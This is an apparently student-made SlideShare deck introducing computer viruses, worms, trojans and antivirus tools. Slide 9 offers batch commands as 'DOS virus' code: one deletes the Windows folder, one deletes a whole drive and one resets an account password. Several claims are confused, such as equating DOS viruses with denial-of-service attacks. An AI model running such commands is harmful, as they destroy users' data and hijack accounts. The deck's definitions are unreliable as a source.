SlideShare une entreprise Scribd logo
1  sur  16
@ Debraj
@ Debraj Chatterjee
 Computer virus refers to a program which
damages computer systems and/or destroys or
erases data files
 It has a Capability to copy itself and infect a
computer without the permission or
knowledge of the owner.
 One of the first detected virus was the Creeper
virus in the early 70’s
Time
Bomb
Logical
Bomb
Worm
Boot
Sector
Virus
Dos
Virus
Trojan
Horse
Time
Bomb
A time bomb is a virus
program that performs an
activity on a particular
date
It is a piece of Programming
Code designed to damage a
computer system at some
point in the future. Time
Bombs can Be set to Go Off
on a certain Date, or
after the bomb copies
itself a certain no.of
times. When It explodes,
it can disable other
Software, destroy files of
crash the whole System.
Logic Bomb
 A logic bomb is a sort of program or
you can say a part of some program
which let itself dormant till a certain
logic program is activated. A logic
bomb is very comparable to a land mine.
Most of a time an activation key for a
logic bomb, is a date. The logic bomb
keeps checking the system for date and
remains in position till the set time
is reached. As soon as time has been
reached it activates itself.
 Logic bomb lacks the power to replicate
itself so it is an easy task to write a
logic bomb. And it would also don’t
spread to unintended systems. It is a
sort of civilized program threat.
 The classic use of this virus is
ensuring payment for some software. If
you don’t pay for some software then it
is certain that embedded logic bomb
would be activated and deletes that
software from your system. And if more
malicious then it would result other
data deleting from your system.
Worm
Top 10 Computer Worms in
Internet History:
Morris(1988)
Melissa(1999)
I Love You(2000)
Nimdah(2001)
Code Red(2001)
Blaster(2003)
Slammer(2003)
Sasser(2004)
Storm(2007)
Conficker(2009)
It is a code designed to damage a
wide network of Computers. A
common purpose of worms is to
install a backdoor into a
computer. These are programs
that allow others to gain
access to your computer. Worms
Spread by digging into the e-
Mail address book and sending
themselves automatically to
everyone the victim knows. Once
they get started, Worms not
only Wreck individual computers
but also attack website
servers. In 2003, a Worm
threatened to take down the
Whole
internet. W32.Mydoom.AX@mm i
s an example of a worm. It
was designed to allow
spammers to send spam e-
mail from infected computers
Boot Sector Virus
The boot sector is the first software loaded
onto your computer. This program resides on
a disk, and this disk can be either the hard
disk inside the computer, a floppy disk or a
CD.
A boot sector virus infects computers by
modifying the contents of the boot sector
program. It replaces the legitimate contents
with its own infected version. A boot sector
virus can only infect a machine if it is
used to boot-up your computer, e.g. if you
start your computer by using a floppy disk
with an infected boot sector, your computer
is likely to be infected. A boot sector
cannot infect a computer if it is introduced
after the machine is running the operating
system.
An example of a boot sector virus is Parity
Boot. This Virus displays the message PARITY
CHECK and freezes the operating system,
rendering the computer useless. This virus
message is taken from an actual error
message which is displayed to users when a
computer's memory is faulty. As a result, a
user whose computer is infected with the
Parity Boot virus is led to believe that the
machine has a memory fault rather than an
disruptive virus infection.
Dos Virus
The Viruses scripting done
using DOS in known as Dos
Virus.
They are mainly used to destroy
the Victim’s System and not
really related to stealing of
The Stuff Through a
Network.
A denial of service(DOS) attack
can also destroy
programming and files in
affected computer systems.
 ******************************start of code*****
@echo off
cd
cd c:window
@deltree/y c:windows
exit
**************end of code******** ******************************start of code*****
Changing Account Password:
net user [annount_name] *
ex:- net user john *
**************end of code********
******************************start of code*****
Deleting all files of a drive:
@echo off
rd /s /q [drivename:]
**************end of code********
Trojan
Horse
 It is a Malicious Software disguised as
a useful program or computer File.
How Trojans work
 Trojans usually consist of two parts, a
Client and a Server. The server is run
on the victim's machine and listens for
connections from a Client used by the
attacker.
 When the server is run on a machine it
will listen on a specific port or
multiple ports for connections from a
Client. In order for an attacker to
connect to the server they must have
the IP Address of the computer where
the server is being run. Some trojans
have the IP Address of the computer
they are running on sent to the
attacker via email or another form of
communication.
Once a connection is made to the
server, the client can then send
commands to the server; the server will
then execute these commands on the
victim's machine.
 The one and the safest method is the use of an Anti-Virus
Program.
 How does an Antivirus work?
Antivirus is the prime line of defense which operates to
eliminate and destroy malwares. Simply put, an Antivirus
scans our system to detect and eliminate malwares. Not only
system checking but any new file is checked due to
suspicion before being downloaded into our system.
They Search For Virus Files into the whole System and either
delets them or ignors them according to the User’s Choice.
 Norton Anti-Virus
 Avast Security Centre
 Kaspersky Anti-virus
 Avira Anti-virus
 Quick-Heal Antivirus
 Bit-Defender Antivirus
 Guardian Anti-Virus
Virus Attacks are most Common in every Computer,
specially when connected to the Internet. What We
need to do is to prevent from harming the System.
ACTIONS TO PREVENT VIRUS INFECTION
 Installation and updation of Anti-Virus Programs.
 Installation of Security Updates for the Computer.
 Not Opening of unknown e-Mails which may Contain
mostly Virus Files.
 Backing Up of important files in another Drive.
 Changing the Boot Sequence and setting the Hard Disk
as the 1st priority booting device.
 http://en.wikipedia.org/wiki/Computer_virus
#History
 www.microsoft.com
 www.cdebraj98.blogspot.com
 www.google.com
Computer Virus

Contenu connexe

Tendances

Malware- Types, Detection and Future
Malware- Types, Detection and FutureMalware- Types, Detection and Future
Malware- Types, Detection and Futurekaranwayne
 
Computer virus (Microsoft Powerpoint)
Computer virus (Microsoft Powerpoint)Computer virus (Microsoft Powerpoint)
Computer virus (Microsoft Powerpoint)ainizbahari97
 
What is virus and methods to recover from different types of viruses
What is virus and methods to recover from different types of virusesWhat is virus and methods to recover from different types of viruses
What is virus and methods to recover from different types of virusesAjay Sharma
 
Computer viruses
Computer virusesComputer viruses
Computer virusesSimiAttri
 
Computer virus
Computer virusComputer virus
Computer virusUtchi
 
Computer virus
Computer virusComputer virus
Computer virushrithikjha
 
Jeremy Virus Effect
Jeremy   Virus EffectJeremy   Virus Effect
Jeremy Virus Effectguest7b2ba1
 
Computer viruses
Computer virusesComputer viruses
Computer virusesImran Khan
 
Computer viruses and anti viruses by sasikumar
Computer viruses and anti viruses by sasikumarComputer viruses and anti viruses by sasikumar
Computer viruses and anti viruses by sasikumarsasikumr sagabala
 
introduction to malwares,virus,trojan horse
introduction to malwares,virus,trojan horseintroduction to malwares,virus,trojan horse
introduction to malwares,virus,trojan horseSpandan Patnaik
 
computer viruses power point presentation
computer viruses power point presentationcomputer viruses power point presentation
computer viruses power point presentationRohit Kashyap
 
Trojan Horse Presentation
Trojan Horse PresentationTrojan Horse Presentation
Trojan Horse Presentationikmal91
 
Viruses and Anti-Viruses
Viruses and Anti-VirusesViruses and Anti-Viruses
Viruses and Anti-VirusesAyman Hussein
 

Tendances (20)

Malware- Types, Detection and Future
Malware- Types, Detection and FutureMalware- Types, Detection and Future
Malware- Types, Detection and Future
 
Computer Worms
Computer WormsComputer Worms
Computer Worms
 
Computer virus (Microsoft Powerpoint)
Computer virus (Microsoft Powerpoint)Computer virus (Microsoft Powerpoint)
Computer virus (Microsoft Powerpoint)
 
virus,worms & analysis
 virus,worms & analysis virus,worms & analysis
virus,worms & analysis
 
What is virus and methods to recover from different types of viruses
What is virus and methods to recover from different types of virusesWhat is virus and methods to recover from different types of viruses
What is virus and methods to recover from different types of viruses
 
Computer viruses
Computer virusesComputer viruses
Computer viruses
 
Computer virus
Computer virusComputer virus
Computer virus
 
Computer virus
Computer virusComputer virus
Computer virus
 
Computer virus
Computer virusComputer virus
Computer virus
 
Jeremy Virus Effect
Jeremy   Virus EffectJeremy   Virus Effect
Jeremy Virus Effect
 
Computer virus
Computer virusComputer virus
Computer virus
 
Computer viruses
Computer virusesComputer viruses
Computer viruses
 
COMPUTERS ( types of viruses)
COMPUTERS ( types of viruses)COMPUTERS ( types of viruses)
COMPUTERS ( types of viruses)
 
Computer viruses and anti viruses by sasikumar
Computer viruses and anti viruses by sasikumarComputer viruses and anti viruses by sasikumar
Computer viruses and anti viruses by sasikumar
 
introduction to malwares,virus,trojan horse
introduction to malwares,virus,trojan horseintroduction to malwares,virus,trojan horse
introduction to malwares,virus,trojan horse
 
Computer Virus
Computer VirusComputer Virus
Computer Virus
 
computer viruses power point presentation
computer viruses power point presentationcomputer viruses power point presentation
computer viruses power point presentation
 
computer virus
computer viruscomputer virus
computer virus
 
Trojan Horse Presentation
Trojan Horse PresentationTrojan Horse Presentation
Trojan Horse Presentation
 
Viruses and Anti-Viruses
Viruses and Anti-VirusesViruses and Anti-Viruses
Viruses and Anti-Viruses
 

En vedette (20)

Unit 2
Unit 2Unit 2
Unit 2
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Cyber crime ppt
Cyber crime  pptCyber crime  ppt
Cyber crime ppt
 
Electronic evidence digital evidence in india
Electronic evidence  digital evidence in indiaElectronic evidence  digital evidence in india
Electronic evidence digital evidence in india
 
Data protection act
Data protection act Data protection act
Data protection act
 
Indian evidence act 1872.bose
Indian evidence act 1872.boseIndian evidence act 1872.bose
Indian evidence act 1872.bose
 
Computer virus & its cure
Computer virus & its cureComputer virus & its cure
Computer virus & its cure
 
Black hat hackers
Black hat hackersBlack hat hackers
Black hat hackers
 
Hacking Vs Cracking in Computer Networks
Hacking Vs Cracking in Computer NetworksHacking Vs Cracking in Computer Networks
Hacking Vs Cracking in Computer Networks
 
Evidence act1872
Evidence act1872Evidence act1872
Evidence act1872
 
Indian Evidence Act
Indian Evidence ActIndian Evidence Act
Indian Evidence Act
 
(1) evidence (overview)
(1) evidence (overview)(1) evidence (overview)
(1) evidence (overview)
 
Data Privacy and Protection Presentation
Data Privacy and Protection PresentationData Privacy and Protection Presentation
Data Privacy and Protection Presentation
 
Data protection ppt
Data protection pptData protection ppt
Data protection ppt
 
Computer ethics
Computer ethicsComputer ethics
Computer ethics
 
cyber crime & cyber law
cyber crime & cyber lawcyber crime & cyber law
cyber crime & cyber law
 
An Introduction to Cyber Law - I.T. Act 2000 (India)
An Introduction to Cyber Law - I.T. Act 2000 (India)An Introduction to Cyber Law - I.T. Act 2000 (India)
An Introduction to Cyber Law - I.T. Act 2000 (India)
 
Software piracy
Software piracySoftware piracy
Software piracy
 
Cyber law
Cyber lawCyber law
Cyber law
 
Ethical hacking presentation
Ethical hacking presentationEthical hacking presentation
Ethical hacking presentation
 

Similaire à Computer Virus

Seminar project(computer virus)
Seminar project(computer virus)Seminar project(computer virus)
Seminar project(computer virus)cdebraj16101991
 
Virus and antivirus final ppt
Virus and antivirus final pptVirus and antivirus final ppt
Virus and antivirus final pptaritradutta22
 
MALWARE AND ITS TYPES
MALWARE AND ITS TYPES MALWARE AND ITS TYPES
MALWARE AND ITS TYPES Sagilasagi1
 
Presentation2
Presentation2Presentation2
Presentation2Jeslynn
 
Introductions To Malwares
Introductions To MalwaresIntroductions To Malwares
Introductions To MalwaresCyber Vignan
 
How Computer Viruses Work
How Computer Viruses WorkHow Computer Viruses Work
How Computer Viruses WorkCerise Anderson
 
Virusandantivirusfinalppt 110413033802-phpapp02 (1)
Virusandantivirusfinalppt 110413033802-phpapp02 (1)Virusandantivirusfinalppt 110413033802-phpapp02 (1)
Virusandantivirusfinalppt 110413033802-phpapp02 (1)Cimab Butt
 
Computer Viruses and Classification lecture slides ppt
Computer Viruses and Classification lecture slides pptComputer Viruses and Classification lecture slides ppt
Computer Viruses and Classification lecture slides pptOsama Yousaf
 
Computer security threats & prevention
Computer security threats & preventionComputer security threats & prevention
Computer security threats & preventionPriSim
 
Computer viruses
Computer virusesComputer viruses
Computer virusesMDAZAD53
 
Compter virus and its solution
Compter virus and its solutionCompter virus and its solution
Compter virus and its solutionManoj Dongare
 

Similaire à Computer Virus (20)

Seminar project(computer virus)
Seminar project(computer virus)Seminar project(computer virus)
Seminar project(computer virus)
 
Virus and antivirus final ppt
Virus and antivirus final pptVirus and antivirus final ppt
Virus and antivirus final ppt
 
MALWARE AND ITS TYPES
MALWARE AND ITS TYPES MALWARE AND ITS TYPES
MALWARE AND ITS TYPES
 
Presentation2
Presentation2Presentation2
Presentation2
 
Introductions To Malwares
Introductions To MalwaresIntroductions To Malwares
Introductions To Malwares
 
How Computer Viruses Work
How Computer Viruses WorkHow Computer Viruses Work
How Computer Viruses Work
 
Computer crimes
Computer crimesComputer crimes
Computer crimes
 
Final malacious softwares
Final malacious softwaresFinal malacious softwares
Final malacious softwares
 
Virusandantivirusfinalppt 110413033802-phpapp02 (1)
Virusandantivirusfinalppt 110413033802-phpapp02 (1)Virusandantivirusfinalppt 110413033802-phpapp02 (1)
Virusandantivirusfinalppt 110413033802-phpapp02 (1)
 
Computervirus
Computervirus Computervirus
Computervirus
 
Computer Viruses and Classification lecture slides ppt
Computer Viruses and Classification lecture slides pptComputer Viruses and Classification lecture slides ppt
Computer Viruses and Classification lecture slides ppt
 
Virus&malware
Virus&malwareVirus&malware
Virus&malware
 
Know More about Your Enemies
Know More about Your EnemiesKnow More about Your Enemies
Know More about Your Enemies
 
Computer security threats & prevention
Computer security threats & preventionComputer security threats & prevention
Computer security threats & prevention
 
Virus
VirusVirus
Virus
 
Computer virus 18
Computer virus 18Computer virus 18
Computer virus 18
 
virus
virusvirus
virus
 
Virus project
Virus projectVirus project
Virus project
 
Computer viruses
Computer virusesComputer viruses
Computer viruses
 
Compter virus and its solution
Compter virus and its solutionCompter virus and its solution
Compter virus and its solution
 

Dernier

Structuring Teams and Portfolios for Success
Structuring Teams and Portfolios for SuccessStructuring Teams and Portfolios for Success
Structuring Teams and Portfolios for SuccessUXDXConf
 
THE BEST IPTV in GERMANY for 2024: IPTVreel
THE BEST IPTV in  GERMANY for 2024: IPTVreelTHE BEST IPTV in  GERMANY for 2024: IPTVreel
THE BEST IPTV in GERMANY for 2024: IPTVreelreely ones
 
Optimizing NoSQL Performance Through Observability
Optimizing NoSQL Performance Through ObservabilityOptimizing NoSQL Performance Through Observability
Optimizing NoSQL Performance Through ObservabilityScyllaDB
 
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeFree and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeCzechDreamin
 
Enterprise Knowledge Graphs - Data Summit 2024
Enterprise Knowledge Graphs - Data Summit 2024Enterprise Knowledge Graphs - Data Summit 2024
Enterprise Knowledge Graphs - Data Summit 2024Enterprise Knowledge
 
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxUnpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxDavid Michel
 
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxWSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxJennifer Lim
 
UiPath Test Automation using UiPath Test Suite series, part 1
UiPath Test Automation using UiPath Test Suite series, part 1UiPath Test Automation using UiPath Test Suite series, part 1
UiPath Test Automation using UiPath Test Suite series, part 1DianaGray10
 
10 Differences between Sales Cloud and CPQ, Blanka Doktorová
10 Differences between Sales Cloud and CPQ, Blanka Doktorová10 Differences between Sales Cloud and CPQ, Blanka Doktorová
10 Differences between Sales Cloud and CPQ, Blanka DoktorováCzechDreamin
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfFIDO Alliance
 
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomSalesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomCzechDreamin
 
UiPath Test Automation using UiPath Test Suite series, part 2
UiPath Test Automation using UiPath Test Suite series, part 2UiPath Test Automation using UiPath Test Suite series, part 2
UiPath Test Automation using UiPath Test Suite series, part 2DianaGray10
 
Strategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering TeamsStrategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering TeamsUXDXConf
 
Intro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджераIntro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджераMark Opanasiuk
 
WebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM PerformanceWebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM PerformanceSamy Fodil
 
A Business-Centric Approach to Design System Strategy
A Business-Centric Approach to Design System StrategyA Business-Centric Approach to Design System Strategy
A Business-Centric Approach to Design System StrategyUXDXConf
 
Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdfWhere to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdfFIDO Alliance
 
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)Julian Hyde
 
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...CzechDreamin
 
Speed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in MinutesSpeed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in Minutesconfluent
 

Dernier (20)

Structuring Teams and Portfolios for Success
Structuring Teams and Portfolios for SuccessStructuring Teams and Portfolios for Success
Structuring Teams and Portfolios for Success
 
THE BEST IPTV in GERMANY for 2024: IPTVreel
THE BEST IPTV in  GERMANY for 2024: IPTVreelTHE BEST IPTV in  GERMANY for 2024: IPTVreel
THE BEST IPTV in GERMANY for 2024: IPTVreel
 
Optimizing NoSQL Performance Through Observability
Optimizing NoSQL Performance Through ObservabilityOptimizing NoSQL Performance Through Observability
Optimizing NoSQL Performance Through Observability
 
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeFree and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
 
Enterprise Knowledge Graphs - Data Summit 2024
Enterprise Knowledge Graphs - Data Summit 2024Enterprise Knowledge Graphs - Data Summit 2024
Enterprise Knowledge Graphs - Data Summit 2024
 
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxUnpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
 
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxWSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
 
UiPath Test Automation using UiPath Test Suite series, part 1
UiPath Test Automation using UiPath Test Suite series, part 1UiPath Test Automation using UiPath Test Suite series, part 1
UiPath Test Automation using UiPath Test Suite series, part 1
 
10 Differences between Sales Cloud and CPQ, Blanka Doktorová
10 Differences between Sales Cloud and CPQ, Blanka Doktorová10 Differences between Sales Cloud and CPQ, Blanka Doktorová
10 Differences between Sales Cloud and CPQ, Blanka Doktorová
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
 
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomSalesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
 
UiPath Test Automation using UiPath Test Suite series, part 2
UiPath Test Automation using UiPath Test Suite series, part 2UiPath Test Automation using UiPath Test Suite series, part 2
UiPath Test Automation using UiPath Test Suite series, part 2
 
Strategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering TeamsStrategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering Teams
 
Intro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджераIntro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджера
 
WebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM PerformanceWebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM Performance
 
A Business-Centric Approach to Design System Strategy
A Business-Centric Approach to Design System StrategyA Business-Centric Approach to Design System Strategy
A Business-Centric Approach to Design System Strategy
 
Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdfWhere to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
 
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
 
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
 
Speed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in MinutesSpeed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in Minutes
 

Computer Virus

  • 1. @ Debraj @ Debraj Chatterjee
  • 2.  Computer virus refers to a program which damages computer systems and/or destroys or erases data files  It has a Capability to copy itself and infect a computer without the permission or knowledge of the owner.  One of the first detected virus was the Creeper virus in the early 70’s
  • 4. Time Bomb A time bomb is a virus program that performs an activity on a particular date It is a piece of Programming Code designed to damage a computer system at some point in the future. Time Bombs can Be set to Go Off on a certain Date, or after the bomb copies itself a certain no.of times. When It explodes, it can disable other Software, destroy files of crash the whole System.
  • 5. Logic Bomb  A logic bomb is a sort of program or you can say a part of some program which let itself dormant till a certain logic program is activated. A logic bomb is very comparable to a land mine. Most of a time an activation key for a logic bomb, is a date. The logic bomb keeps checking the system for date and remains in position till the set time is reached. As soon as time has been reached it activates itself.  Logic bomb lacks the power to replicate itself so it is an easy task to write a logic bomb. And it would also don’t spread to unintended systems. It is a sort of civilized program threat.  The classic use of this virus is ensuring payment for some software. If you don’t pay for some software then it is certain that embedded logic bomb would be activated and deletes that software from your system. And if more malicious then it would result other data deleting from your system.
  • 6. Worm Top 10 Computer Worms in Internet History: Morris(1988) Melissa(1999) I Love You(2000) Nimdah(2001) Code Red(2001) Blaster(2003) Slammer(2003) Sasser(2004) Storm(2007) Conficker(2009) It is a code designed to damage a wide network of Computers. A common purpose of worms is to install a backdoor into a computer. These are programs that allow others to gain access to your computer. Worms Spread by digging into the e- Mail address book and sending themselves automatically to everyone the victim knows. Once they get started, Worms not only Wreck individual computers but also attack website servers. In 2003, a Worm threatened to take down the Whole internet. W32.Mydoom.AX@mm i s an example of a worm. It was designed to allow spammers to send spam e- mail from infected computers
  • 7. Boot Sector Virus The boot sector is the first software loaded onto your computer. This program resides on a disk, and this disk can be either the hard disk inside the computer, a floppy disk or a CD. A boot sector virus infects computers by modifying the contents of the boot sector program. It replaces the legitimate contents with its own infected version. A boot sector virus can only infect a machine if it is used to boot-up your computer, e.g. if you start your computer by using a floppy disk with an infected boot sector, your computer is likely to be infected. A boot sector cannot infect a computer if it is introduced after the machine is running the operating system. An example of a boot sector virus is Parity Boot. This Virus displays the message PARITY CHECK and freezes the operating system, rendering the computer useless. This virus message is taken from an actual error message which is displayed to users when a computer's memory is faulty. As a result, a user whose computer is infected with the Parity Boot virus is led to believe that the machine has a memory fault rather than an disruptive virus infection.
  • 8. Dos Virus The Viruses scripting done using DOS in known as Dos Virus. They are mainly used to destroy the Victim’s System and not really related to stealing of The Stuff Through a Network. A denial of service(DOS) attack can also destroy programming and files in affected computer systems.
  • 9.  ******************************start of code***** @echo off cd cd c:window @deltree/y c:windows exit **************end of code******** ******************************start of code***** Changing Account Password: net user [annount_name] * ex:- net user john * **************end of code******** ******************************start of code***** Deleting all files of a drive: @echo off rd /s /q [drivename:] **************end of code********
  • 10. Trojan Horse  It is a Malicious Software disguised as a useful program or computer File. How Trojans work  Trojans usually consist of two parts, a Client and a Server. The server is run on the victim's machine and listens for connections from a Client used by the attacker.  When the server is run on a machine it will listen on a specific port or multiple ports for connections from a Client. In order for an attacker to connect to the server they must have the IP Address of the computer where the server is being run. Some trojans have the IP Address of the computer they are running on sent to the attacker via email or another form of communication. Once a connection is made to the server, the client can then send commands to the server; the server will then execute these commands on the victim's machine.
  • 11.
  • 12.  The one and the safest method is the use of an Anti-Virus Program.  How does an Antivirus work? Antivirus is the prime line of defense which operates to eliminate and destroy malwares. Simply put, an Antivirus scans our system to detect and eliminate malwares. Not only system checking but any new file is checked due to suspicion before being downloaded into our system. They Search For Virus Files into the whole System and either delets them or ignors them according to the User’s Choice.
  • 13.  Norton Anti-Virus  Avast Security Centre  Kaspersky Anti-virus  Avira Anti-virus  Quick-Heal Antivirus  Bit-Defender Antivirus  Guardian Anti-Virus
  • 14. Virus Attacks are most Common in every Computer, specially when connected to the Internet. What We need to do is to prevent from harming the System. ACTIONS TO PREVENT VIRUS INFECTION  Installation and updation of Anti-Virus Programs.  Installation of Security Updates for the Computer.  Not Opening of unknown e-Mails which may Contain mostly Virus Files.  Backing Up of important files in another Drive.  Changing the Boot Sequence and setting the Hard Disk as the 1st priority booting device.